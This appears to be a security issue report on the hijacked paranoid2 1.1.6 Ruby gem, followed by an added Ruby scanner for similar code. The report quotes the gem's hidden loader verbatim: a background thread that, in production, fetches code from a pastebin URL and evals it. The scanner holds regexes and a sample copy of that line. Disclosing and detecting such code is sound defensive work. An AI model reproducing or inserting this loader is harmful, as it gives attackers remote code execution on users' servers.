Hi,
paranoid2 version 1.1.6 is compromised and is malware. Please remove it! The attack is similar to the recently reported strong_password, and the code snippet is located at paranoid2-1.1.6/lib/paranoid2/persistence.rb:
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}
https://rubygems.org/gems/paranoid2
https://withatwist.dev/strong-password-rubygem-hijacked.html
It looks like it aims to https://github.com/vitorgamer58/Bolsotrade-Graviex.
also to https://www.peatio.com/
The compromised version has been yanked, and the account that pushed the malware has been blocked. Thanks for reporting this!
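As an added example (not part of the original issue or of the paranoid2 project), the following Ruby sketch flags source lines that share the traits of the snippet reported above: `eval` applied to an HTTP response, a background `Thread.new{loop{...}}`, an environment check on a single character of `Rails.env`, and a raw paste URL. The rule names, the helper functions and the sample text with its placeholder URL are constructed for illustration, and the patterns are heuristics that will not match every variant.

```ruby
require "find"

# Heuristic patterns derived from the one-line loader quoted in the issue.
RULES = {
  remote_eval:   /\beval\s*\(?\s*[^#\n]*Net::HTTP\.get\b/, # eval of a fetched body
  thread_loop:   /Thread\.new\s*(\{|do)\s*loop\b/,         # endless background worker
  env_char_gate: /Rails\.env\[\d+\]\s*==/,                 # terse "production only" check
  raw_paste_url: %r{https?://pastebin\.com/raw/}           # code hosted on a paste site
}.freeze

# Constructed sample: one benign eval and one line shaped like the reported
# loader, with a placeholder in place of the real paste id. Never executed.
SAMPLE = <<~'RUBY'
  module Example
    def calc; eval("1 + 1"); end   # benign eval, no network fetch
    _!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER')))}}}if Rails.env[0]=="p"}
  end
RUBY

# Return one finding per line that matches at least one rule.
def scan_source(text)
  findings = []
  text.each_line.with_index(1) do |line, number|
    hits = RULES.select { |_, pattern| line.match?(pattern) }.keys
    findings << { line: number, rules: hits } unless hits.empty?
  end
  findings
end

# Walk a directory (for example an unpacked gem) and scan every .rb file.
def scan_tree(root)
  results = {}
  Find.find(root) do |path|
    next unless File.file?(path) && path.end_with?(".rb")
    found = scan_source(File.binread(path))
    results[path] = found unless found.empty?
  end
  results
end

if __FILE__ == $PROGRAM_NAME
  report = ARGV.empty? ? { "(constructed sample)" => scan_source(SAMPLE) } : scan_tree(ARGV[0])
  report.each do |path, hits|
    hits.each { |h| puts "#{path}:#{h[:line]} #{h[:rules].join(',')}" }
  end
end
```

Pass the `gems` directory under the path printed by `gem env gemdir` to review installed gems; any `remote_eval` hit warrants a manual look at the file and a diff against the gem's source repository.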